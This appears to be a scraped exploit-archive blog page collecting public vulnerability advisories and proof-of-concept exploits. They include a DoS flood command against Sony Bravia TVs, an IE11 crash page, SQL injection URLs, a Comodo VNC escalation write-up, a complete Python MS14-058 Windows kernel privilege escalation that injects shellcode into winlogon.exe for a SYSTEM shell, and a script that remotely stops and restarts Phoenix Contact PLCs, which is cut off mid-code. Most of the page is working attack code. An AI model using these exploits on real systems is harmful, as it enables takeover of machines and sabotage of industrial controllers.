source: https://www.securityfocus.com/bid/52893/info
Sony Bravia is prone to a remote denial-of-service vulnerability.
Successful attacks will cause the application to crash, creating a denial-of-service condition.
hping -S TV.IP.Address -p anyport -i u1 --flood
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863143878
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Internet Explorer 11 - Crash PoC
# Google Dork: N/A
# Date: 19th May, 2015
# Exploit Author: garage4hackers
# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246
# Software Link: N/A
# Version: Tested on IE 11
# Tested on: Windows 7
# CVE : N/A
<!doctype html>
<html>
<HEAD><title>case522207.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
content: 'moof';
}
*:nth-child(5)::after {
content:'>>';
}
</style>
</HEAD><body>
<script>
elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur')
elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem3 = document.createElement('dd')
elem4 = document.createElement('map')
elem5 = document.createElement('i')
elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
rangeTxt = document.body.createTextRange()
randOldNode = document.documentElement.firstChild
randOldNode.parentNode.replaceChild(elem2, randOldNode)
rangeTxt.moveEnd('sentence', '-20')
</script>
</body></html>
How do I reproduce it?
- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime.
a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full
b) Execute runMe.html in WinDbg
c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10)
source: https://www.securityfocus.com/bid/52897/info
VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VBulletin 4.1.10 is vulnerable; other versions may also be affected.
http://www.example.com/announcement.php?a=&announcementid=[Sql]
source: https://www.securityfocus.com/bid/52908/info
TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist.
http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
# CVE-2014-4113 Privilege Escalation
# http://www.offensive-security.com
# Thx to Moritz Jodeit for the beautiful writeup
# http://www.exploit-db.com/docs/35152.pdf
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin <at> offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal
ULONG_PTR = PVOID = LPVOID
HCURSOR = HICON
PDWORD = POINTER(DWORD)
PQWORD = POINTER(LPVOID)
LRESULT = LPVOID
UCHAR = c_ubyte
QWORD = c_ulonglong
CHAR = c_char
NTSTATUS = DWORD
MIIM_STRING = 0x00000040
MIIM_SUBMENU = 0x00000004
WH_CALLWNDPROC = 0x4
GWLP_WNDPROC = -0x4
NULL = 0x0
SystemExtendedHandleInformation = 64
ObjectDataInformation = 2
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_BUFFER_OVERFLOW = 0x80000005L
STATUS_INVALID_HANDLE = 0xC0000008L
STATUS_BUFFER_TOO_SMALL = 0xC0000023L
STATUS_SUCCESS = 0
TOKEN_ALL_ACCESS = 0xf00ff
DISABLE_MAX_PRIVILEGE = 0x1
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
TH32CS_SNAPPROCESS = 0x02
WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM)
WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM)
WNDPROC = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM)
bWndProcFlag = False
bHookCallbackFlag = False
EXPLOITED = False
Hmenu01 = Hmenu02 = None
# /*
# * windows/x64/exec - 275 bytes
# * http://www.metasploit.com
# * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# * CMD=cmd.exe
# */
SHELLCODE = (
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
"\x2e\x65\x78\x65\x00")
class LSA_UNICODE_STRING(Structure):
"""Represent the LSA_UNICODE_STRING on ntdll."""
_fields_ = [
("Length", USHORT),
("MaximumLength", USHORT),
("Buffer", LPWSTR),
]
class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
"""Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
_fields_ = [
("Object", PVOID),
("UniqueProcessId", PVOID),
("HandleValue", PVOID),
("GrantedAccess", ULONG),
("CreatorBackTraceIndex", USHORT),
("ObjectTypeIndex", USHORT),
("HandleAttributes", ULONG),
("Reserved", ULONG),
]
class SYSTEM_HANDLE_INFORMATION_EX(Structure):
"""Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
_fields_ = [
("NumberOfHandles", PVOID),
("Reserved", PVOID),
("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
]
class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
"""Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
_fields_ = [
("Name", LSA_UNICODE_STRING),
("Reserved", ULONG * 22),
]
class MENUITEMINFO(Structure):
"""Contains information about a menu item."""
_fields_ = [
("cbSize" , UINT),
("fMask" , UINT),
("fType" , UINT),
("fState" , UINT),
("wID" , UINT),
("hSubMenu" , HMENU),
("hbmpChecked" , HBITMAP),
("hbmpUnchecked", HBITMAP),
("dwItemData" , ULONG_PTR),
("dwTypeData" , LPWSTR),
("cch" , UINT),
("hbmpItem" , HBITMAP),
]
class WNDCLASS(Structure):
"""Contains the window class attributes that are registered by the
RegisterClass function."""
_fields_ = [
("style" , UINT),
("lpfnWndProc" , WNDPROC),
("cbClsExtra" , INT),
("cbWndExtra" , INT),
("hInstance" , HINSTANCE),
("hIcon" , HCURSOR),
("hCursor" , HBITMAP),
("hbrBackground", HBRUSH),
("lpszMenuName" , LPWSTR),
("lpszClassName", LPWSTR),
]
class PROCESSENTRY32(Structure):
"""Describes an entry from a list of the processes residing in the system
address space when a snapshot was taken."""
_fields_ = [ ( 'dwSize' , DWORD ) ,
( 'cntUsage' , DWORD) ,
( 'th32ProcessID' , DWORD) ,
( 'th32DefaultHeapID' , POINTER(ULONG)) ,
( 'th32ModuleID' , DWORD) ,
( 'cntThreads' , DWORD) ,
( 'th32ParentProcessID' , DWORD) ,
( 'pcPriClassBase' , LONG) ,
( 'dwFlags' , DWORD) ,
( 'szExeFile' , CHAR * MAX_PATH )
]
user32 = windll.user32
kernel32 = windll.kernel32
ntdll = windll.ntdll
advapi32 = windll.advapi32
user32.PostMessageW.argtypes = [HWND, UINT, WPARAM, LPARAM]
user32.PostMessageW.restype = BOOL
user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM]
user32.DefWindowProcW.restype = LRESULT
user32.UnhookWindowsHook.argtypes = [DWORD, WinFunc1]
user32.UnhookWindowsHook.restype = BOOL
user32.SetWindowLongPtrW.argtypes = [HWND, DWORD, WinFunc2]
user32.SetWindowLongPtrW.restype = LPVOID
user32.CallNextHookEx.argtypes = [DWORD, DWORD, WPARAM, LPARAM]
user32.CallNextHookEx.restype = LRESULT
user32.RegisterClassW.argtypes = [LPVOID]
user32.RegisterClassW.restype = BOOL
user32.CreateWindowExW.argtypes = [DWORD, LPWSTR, LPWSTR, DWORD,
INT, INT, INT, INT, HWND, HMENU,
HINSTANCE, LPVOID]
user32.CreateWindowExW.restype = HWND
user32.InsertMenuItemW.argtypes = [HMENU, UINT, BOOL, LPVOID]
user32.InsertMenuItemW.restype = BOOL
user32.DestroyMenu.argtypes = [HMENU]
user32.DestroyMenu.restype = BOOL
user32.SetWindowsHookExW.argtypes = [DWORD, WinFunc1, DWORD, DWORD]
user32.SetWindowsHookExW.restype = BOOL
user32.TrackPopupMenu.argtypes = [HMENU, UINT, INT, INT, INT, HWND,
DWORD]
user32.TrackPopupMenu.restype = BOOL
advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)]
advapi32.OpenProcessToken.restype = BOOL
advapi32.CreateRestrictedToken.argtypes = [HANDLE, DWORD, DWORD, DWORD,
DWORD, DWORD, DWORD, DWORD,
POINTER(HANDLE)]
advapi32.CreateRestrictedToken.restype = BOOL
advapi32.AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, DWORD, DWORD,
DWORD, DWORD]
advapi32.AdjustTokenPrivileges.restype = BOOL
advapi32.ImpersonateLoggedOnUser.argtypes = [HANDLE]
advapi32.ImpersonateLoggedOnUser.restype = BOOL
kernel32.GetCurrentProcess.restype = HANDLE
kernel32.WriteProcessMemory.argtypes = [HANDLE, QWORD, LPCSTR, DWORD,
POINTER(LPVOID)]
kernel32.WriteProcessMemory.restype = BOOL
kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD]
kernel32.OpenProcess.restype = HANDLE
kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD,
DWORD]
kernel32.VirtualAllocEx.restype = LPVOID
kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD,
LPVOID, DWORD, POINTER(HANDLE)]
kernel32.CreateRemoteThread.restype = BOOL
kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD]
kernel32.CreateToolhelp32Snapshot.restype = HANDLE
kernel32.CloseHandle.argtypes = [HANDLE]
kernel32.CloseHandle.restype = BOOL
kernel32.Process32First.argtypes = [HANDLE, POINTER(PROCESSENTRY32)]
kernel32.Process32First.restype = BOOL
kernel32.Process32Next.argtypes = [HANDLE, POINTER(PROCESSENTRY32)]
kernel32.Process32Next.restype = BOOL
kernel32.GetCurrentThreadId.restype = DWORD
ntdll.NtAllocateVirtualMemory.argtypes = [HANDLE, LPVOID, ULONG, LPVOID,
ULONG, DWORD]
ntdll.NtAllocateVirtualMemory.restype = NTSTATUS
ntdll.NtQueryObject.argtypes = [HANDLE, DWORD,
POINTER(PUBLIC_OBJECT_TYPE_INFORMATION),
DWORD, DWORD]
ntdll.NtQueryObject.restype = NTSTATUS
ntdll.NtQuerySystemInformation.argtypes = [DWORD,
POINTER(SYSTEM_HANDLE_INFORMATION_EX),
DWORD, POINTER(DWORD)]
ntdll.NtQuerySystemInformation.restype = NTSTATUS
def log(msg, e=None):
if e == "e":
msg = "[!] " + msg
if e == "d":
msg = "[*] " + msg
else:
msg = "[+] " + msg
print msg
def getLastError():
"""Format GetLastError"""
buf = create_string_buffer(2048)
if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
kernel32.GetLastError(), 0,
buf, sizeof(buf), NULL):
log(buf.value, "e")
else:
log("Unknown Error", "e")
class x_file_handles (Exception):
pass
def get_type_info(handle):
"""Get the handle type information."""
public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
size = DWORD(sizeof(public_object_type_information))
while True:
result = ntdll.NtQueryObject(handle, ObjectDataInformation,
byref(public_object_type_information), size, 0x0)
if result == STATUS_SUCCESS:
return public_object_type_information.Name.Buffer
elif result == STATUS_INFO_LENGTH_MISMATCH:
size = DWORD(size.value * 4)
resize(public_object_type_information, size.value)
elif result == STATUS_INVALID_HANDLE:
return "INVALID HANDLE: %s" % hex(handle)
else:
raise x_file_handles("NtQueryObject", hex(result))
def get_handles():
"""Return all the open handles in the system"""
system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
size = DWORD (sizeof (system_handle_information))
while True:
result = ntdll.NtQuerySystemInformation(
SystemExtendedHandleInformation,
byref(system_handle_information),
size,
byref(size)
)
if result == STATUS_SUCCESS:
break
elif result == STATUS_INFO_LENGTH_MISMATCH:
size = DWORD(size.value * 4)
resize(system_handle_information, size.value)
else:
raise x_file_handles("NtQuerySystemInformation", hex(result))
pHandles = cast(
system_handle_information.Handles,
POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
system_handle_information.NumberOfHandles)
)
for handle in pHandles.contents:
yield handle.UniqueProcessId, handle.HandleValue, handle.Object
def WndProc(hwnd, message, wParam, lParam):
"""Window procedure"""
global bWndProcFlag
if message == 289 and not bWndProcFlag:
bWndProcFlag = True
user32.PostMessageW(hwnd, 256, 40, 0)
user32.PostMessageW(hwnd, 256, 39, 0)
user32.PostMessageW(hwnd, 513, 0, 0)
return user32.DefWindowProcW(hwnd, message, wParam, lParam)
def hook_callback_one(code, wParam, lParam):
"""Sets a new address for the window procedure"""
global bHookCallbackFlag
if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\
not bHookCallbackFlag:
bHookCallbackFlag = True
if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01):
# Sets a new address for the window procedure
log("Callback triggered!")
log("Setting the new address for the window procedure...")
lpPrevWndFunc = user32.SetWindowLongPtrW\
((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value,
GWLP_WNDPROC, CALLBACK02)
return user32.CallNextHookEx(0, code, wParam, lParam)
def hook_callback_two(hWnd, Msg, wParam, lParam):
"""Once called will return the fake tagWND address"""
global EXPLOITED
user32.EndMenu()
EXPLOITED = True
log("Returning the fake tagWND and overwriting token privileges...")
return 0x00000000FFFFFFFB
def buildMenuAndTrigger():
"""Create menus and invoke TrackPopupMenu"""
global Hmenu01, Hmenu02
log("Creating windows and menus...")
wndClass = WNDCLASS()
wndClass.lpfnWndProc = WNDPROC(WndProc)
wndClass.lpszClassName = u"pwned"
wndClass.cbClsExtra = wndClass.cbWndExtra = 0
# Registering Class
if not user32.RegisterClassW(addressof(wndClass)):
log("RegisterClassW failed", "e")
sys.exit()
# Creating the Window
hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0,
0, NULL, NULL, NULL, NULL)
if not hWnd:
log("CreateWindowExW Failed", "e")
sys.exit()
# Creating popup menu
user32.CreatePopupMenu.restype = HMENU
Hmenu01 = user32.CreatePopupMenu()
if not Hmenu01:
log("CreatePopupMenu failed 0x1", "e")
sys.exit()
Hmenu01Info = MENUITEMINFO()
Hmenu01Info.cbSize = sizeof(MENUITEMINFO)
Hmenu01Info.fMask = MIIM_STRING
# Insert first menu
if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)):
log("Error in InsertMenuItema 0x1", "e")
user32.DestroyMenu(Hmenu01)
sys.exit()
# Creating second menu
Hmenu02 = user32.CreatePopupMenu()
if not Hmenu02:
log("CreatePopupMenu failed 0x2", "e")
sys.exit()
Hmenu02Info = MENUITEMINFO()
Hmenu02Info.cbSize = sizeof(MENUITEMINFO)
Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU)
Hmenu02Info.dwTypeData = ""
Hmenu02Info.cch = 1
Hmenu02Info.hSubMenu = Hmenu01
# Insert second menu
if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)):
log("Error in InsertMenuItema 0x2", "e")
user32.DestroyMenu(Hmenu01)
user32.DestroyMenu(Hmenu01)
sys.exit()
# Set window callback
tid = kernel32.GetCurrentThreadId()
if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid):
log("Failed SetWindowsHookExA 0x1", "e")
sys.exit()
# Crash it!
log("Invoking TrackPopupMenu...")
user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL)
def alloctagWND():
"""Allocate a fake tagWND in userspace at address 0x00000000fffffff0"""
hProcess = HANDLE(kernel32.GetCurrentProcess())
hToken = HANDLE()
hRestrictedToken = HANDLE()
if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)):
log("Could not open current process token", "e")
getLastError()
sys.exit()
if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0,
0, 0, 0, 0, byref(hRestrictedToken)):
log("Could not create the restricted token", "e")
getLastError()
sys.exit()
if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0,
NULL, NULL):
log("Could not adjust privileges to the restricted token", "e")
getLastError()
sys.exit()
# Leak Token addresses in kernel space
log("Leaking token addresses from kernel space...")
for pid, handle, obj in get_handles():
if pid==os.getpid() and get_type_info(handle) == "Token":
if hToken.value == handle:
log("Current process token address: %x" % obj)
if hRestrictedToken.value == handle:
log("Restricted token address: %x" % obj)
RestrictedToken = obj
CurrentProcessWin32Process = "\x00"*8
# nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES
# +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8
TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8)
tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\
"\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\
"\x00"*8 +\
"\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\
TokenAddress + "\x47"*0x28
## Allocate space for the input buffer
lpBaseAddress = LPVOID(0x00000000fffffff0)
Zerobits = ULONG(0)
RegionSize = LPVOID(0x1000)
written = LPVOID(0)
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff,
byref(lpBaseAddress),
0x0,
byref(RegionSize),
VIRTUAL_MEM,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
log("Failed to allocate tagWND object", "e")
getLastError()
sys.exit()
# Copy input buffer to the fake tagWND
nSize = 0x200
written = LPVOID(0)
lpBaseAddress = QWORD(0x00000000fffffff0)
dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff,
lpBaseAddress,
tagWND,
nSize,
byref(written))
if dwStatus == 0:
log("Failed to copy the input buffer to the tagWND object", "e")
getLastError()
sys.exit()
log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\
(written.value, lpBaseAddress.value))
return hRestrictedToken
def injectShell(hPrivilegedToken):
"""Impersonate privileged token and inject shellcode into winlogon.exe"""
while not EXPLOITED:
time.sleep(0.1)
log("-"*70)
log("Impersonating the privileged token...")
if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken):
log("Could not impersonate the privileged token", "e")
getLastError()
sys.exit()
# Get winlogon.exe pid
pid = getpid("winlogon.exe")
# Get a handle to the winlogon process we are injecting into
hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
if not hProcess:
log("Couldn't acquire a handle to PID: %s" % pid, "e")
sys.exit()
log("Obtained handle 0x%x for the winlogon.exe process" % hProcess)
# Creating shellcode buffer to inject into the host process
sh = create_string_buffer(SHELLCODE, len(SHELLCODE))
code_size = len(SHELLCODE)
# Allocate some space for the shellcode (in the program memory)
sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM,
PAGE_EXECUTE_READWRITE)
if not sh_address:
log("Could not allocate shellcode in the remote process")
getLastError()
sys.exit()
log("Allocated memory at address 0x%x" % sh_address)
# Inject shellcode in to winlogon.exe process space
written = LPVOID(0)
shellcode = QWORD(sh_address)
dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size,
byref(written))
if not dwStatus:
log("Could not write shellcode into winlogon.exe", "e")
getLastError()
sys.exit()
log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address))
# Now we create the remote thread and point its entry routine to be head of
# our shellcode
thread_id = HANDLE(0)
if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0,
byref(thread_id)):
log("Failed to inject shellcode into winlogon.exe")
sys.exit(0)
log("Remote thread 0x%08x created" % thread_id.value)
log("Spawning SYSTEM shell...")
# Kill python process to kill the window and avoid BSODs
os.kill(os.getpid(), signal.SIGABRT)
def getpid(procname):
""" Get Process Pid by procname """
pid = None
try:
hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
pe32 = PROCESSENTRY32()
pe32.dwSize = sizeof(PROCESSENTRY32)
ret = kernel32.Process32First(hProcessSnap , byref(pe32))
while ret:
if pe32.szExeFile == LPSTR(procname).value:
pid = pe32.th32ProcessID
ret = kernel32.Process32Next(hProcessSnap, byref(pe32))
kernel32.CloseHandle ( hProcessSnap )
except Exception, e:
log(str(e), "e")
if not pid:
log("Could not find %s PID" % procname)
sys.exit()
return pid
CALLBACK01 = WinFunc1(hook_callback_one)
CALLBACK02 = WinFunc2(hook_callback_two)
if __name__ == '__main__':
log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com",
"d")
# Prepare the battlefield
hPrivilegedToken = alloctagWND()
# Start the injection thread
t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,))
t1.daemon = False
t1.start()
# Trigger the vuln
buildMenuAndTrigger()
Comodo GeekBuddy Local Privilege Escalation (CVE-2014-7872)
Jeremy Brown [jbrown3264/gmail]
-Synopsis-
Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall
and Comodo Internet Security, runs a passwordless, background VNC server
and listens for incoming connections. This can allow for at least local
privilege escalation on several platforms. It also may be remotely
exploitable via CSRF-like attacks utilizing a modified web-based VNC client
(eg. a Java VNC client).
-Repro-
1) Install GeekBuddy (either standalone or bundled with the aforementioned
packages)
2) Administrator (or other user) logs into the system so the VNC server
will be started
3) Start another login to the system (eg. target OS is Windows Server)
4) Connect to the VNC server on localhost to assume the Admin session
-Fix-
Comodo says they have fix this vulnerability with the v4.18.121 release in
October 2014
-References-
https://technet.microsoft.com/en-US/dn613815
http://archive.hack.lu/2014/Microsoft%20Vulnerability%20Research%20-%20How%20to%20be%20a%20Finder%20as%20a%20Vendor.pdf
#!/usr/bin/env python
'''
# Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script
# Date: 2015-05-19
# Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be
# Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330
# Version: ALL FW VERSIONS
# Tested on: Python runs on Windows, Linux
# CVE : CVE-2014-9195
Copyright 2015 Photubias(c)
Written for Howest(c) University College
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name ControlPLC.py
written by tijl[dot]deneut[at]howest[dot]be
This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds
Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x
'''
import sys, socket, binascii, time, os, select, re
IP=''
infoport=1962
controlport=41100
## Defining Functions First
def send_and_recv(s,size,strdata):
data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...)
s.send(data)
ret = s.recv(4096)
return ret
def doAction(s,strdata):
ret = send_and_recv(s,1000,strdata)
# In official state these are send, they do not seem to be needed
send_and_recv(s,1000,packet1)
send_and_recv(s,1000,packet2)
send_and_recv(s,1000,packet2)
ret = send_and_recv(s,1000,'010002000000020003000100000000000840')
send_and_recv(s,1000,packet2)
return ret
def initMonitor(s):
send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200')
send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500')
send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300')
send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500')
send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200')
send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500')
send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500')
send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200')
send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500')
send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300')
send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200')
send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200')
return
def is_ipv4(ip):
match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
if not match:
return False
quad = []
for number in match.groups():
quad.append(int(number))
if quad[0] < 1:
return False
for number in quad:
if number > 255 or number < 0:
return False
return True
##### The Actual Program
if not len(sys.argv) == 2:
IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ")
else:
IP = sys.argv[1]
if not is_ipv4(IP):
print "Please go read RFC 791 and then use a legitimate IPv4 address."
sys.exit()
## - initialization, this will get the PLC type, Firmware version, build date & time
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,infoport))
print 'Initializing PLC'
print '----------------'
code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36]
